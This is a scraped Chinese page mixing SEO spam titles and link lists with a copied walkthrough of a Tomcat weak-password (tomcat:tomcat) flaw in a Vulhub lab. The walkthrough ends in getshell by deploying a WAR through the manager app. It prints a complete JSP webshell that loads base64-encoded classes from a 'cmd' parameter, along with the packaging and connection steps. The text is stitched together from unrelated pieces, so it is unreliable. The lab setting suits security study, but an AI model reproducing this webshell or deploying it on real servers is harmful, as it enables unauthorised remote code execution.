当前位置: 首页 > news >正文

遵义建站青岛市做网站优化

遵义建站,青岛市做网站优化,wordpress 本地 上传,学it学费大概多少钱感谢互联网提供分享知识与智慧#xff0c;在法治的社会里#xff0c;请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证 说明内容漏洞编号漏洞名称Tomcat7 弱口令 后台getshell漏洞漏洞评级高… 感谢互联网提供分享知识与智慧在法治的社会里请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证 说明内容漏洞编号漏洞名称Tomcat7 弱口令 后台getshell漏洞漏洞评级高危影响范围Tomcat 版本8.0漏洞描述Tomcat 支持在后台部署 war 文件可以直接将 webshell 部署到 web 目录下。其中欲访问后台需要对应用户有相应权限tomcat8中默认没有任何用户且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下才可以进行攻击修复方案 1.1、漏洞描述 Tomcat 支持在后台部署 war 文件可以直接将 webshell 部署到 web 目录下。其中欲访问后台需要对应用户有相应权限 Tomcat7权限分为 manager后台管理 manager-gui 拥有html页面权限manager-status 拥有查看status的权限manager-script 拥有text接口的权限和status权限manager-jmx 拥有jmx权限和status权限 host-manager虚拟主机管理 admin-gui 拥有html页面权限admin-script 拥有text接口权限 这些权限的究竟有什么作用详情阅读 http://tomcat.apache.org/tomcat-8.5-doc/manager-howto.html 在conf/tomcat-users.xml文件中配置用户的权限 ?xml version1.0 encodingUTF-8? tomcat-users xmlnshttp://tomcat.apache.org/xmlxmlns:xsihttp://www.w3.org/2001/XMLSchema-instancexsi:schemaLocationhttp://tomcat.apache.org/xml tomcat-users.xsdversion1.0role rolenamemanager-gui/role rolenamemanager-script/role rolenamemanager-jmx/role rolenamemanager-status/role rolenameadmin-gui/role rolenameadmin-script/user usernametomcat passwordtomcat rolesmanager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script //tomcat-users可见用户tomcat拥有上述所有权限密码是tomcat。 正常安装的情况下tomcat8中默认没有任何用户且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下才可以进行攻击。 1.2、漏洞等级 高危 1.3、影响版本 Tomcat 版本8.0 1.4、漏洞复现 1、基础环境 PathVulhub/tomcat/tomcat8 启动测试环境 sudo docker-compose up -d访问http://your-ip:8080/即可看到 点击Manager App即可跳到管理登陆页面 输入用户名密码 tomcat:tomcat来到管理界面 2、漏洞扫描 3、漏洞验证 登录到后台后可以通过部署war包进行getshell 找一个a.jsp木马 %!class U extends ClassLoader {U(ClassLoader c){super(c);}public Class g(byte[] b){return super.defineClass(b,0,b.length);}}public byte[] base64Decode(String str) throws Exception{try{Class clazz Class.forName(sun.misc.BASE64Decoder);return (byte[]) clazz.getMethod(decodeBuffer,String.class).invoke(clazz.newInstance(),str);}catch (Exception e){Class clazz Class.forName(java.util.Base64);Object decoder clazz.getMethod(getDecoder).invoke(null);return(byte[])decoder.getClass().getMethod(decode,String.class).invoke(decoder,str);}} % % String cls request.getParameter(cmd);if(cls ! null){new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext); } % 打包成war包 jar cvf tomcat.war a.jsp上传打包的tomcat.war 生成一个tomcat的路径 在地址栏路径中访问http://192.168.80.141:8080/tomcat/a.jsp 蚁剑连接密码cmd
http://www.pierceye.com/news/507584/

相关文章:

  • 网站建设是属于软件吗电话销售哪里找客户电话
  • 用vue做网站的实例网站制作郑州
  • 五个网站想自己在家做外贸网站
  • 收费的电影网站怎么做网页设计图片的应用
  • 班级网站建设步骤橘子皮主题wordpress
  • 网站模板源文件网站制作需求文档
  • 青岛注册公司网站建网站需要那些步骤
  • 深圳做网上商城网站小蘑菇网站建设软件
  • 广州住建网站网站空间购买价格
  • 金华永康网站建设公司做网站的优点
  • 有免费的微网站制作吗瑞安哪里有培训做网站的
  • 苏州住房和城乡建设局网站wordpress中文书
  • 盐城市滨海县建设局网站wordpress 4.8.1 漏洞
  • 荆州市城市建设投资开发有限公司网站百度人工服务24小时
  • 永久域名购买昆明网站建设优化企业
  • 自适应网站模板下载网页设计培训哪好
  • 做门窗网站便宜的vps租用网站
  • 龙岗附近公司做网站建设多少钱公司行业类型有哪些
  • 188旅游网站管理系统源码做外贸有那些网站平台
  • 江苏网站建设要多少钱近三个月以来的国际新闻
  • 旬阳做网站免费漫画软件
  • asp相册网站源码企业网站建设的上市公司
  • 做网站和软件哪个挣钱国家企业信用信息公示系统山西
  • 做网站前的准备什么二建证考试需要什么条件
  • 男女做a视频网站asp单页网站源码
  • 手机页面网站模板怎么卖做淘宝保健品药品在哪个网站找素材
  • 青县建设银行网站百度投广告怎么收费
  • 广州天河做网站河南建筑工程信息网官网
  • 展示型网站怎么做响应式网站导航栏内容
  • 建设实验教学网站的作用电脑前端主要做什么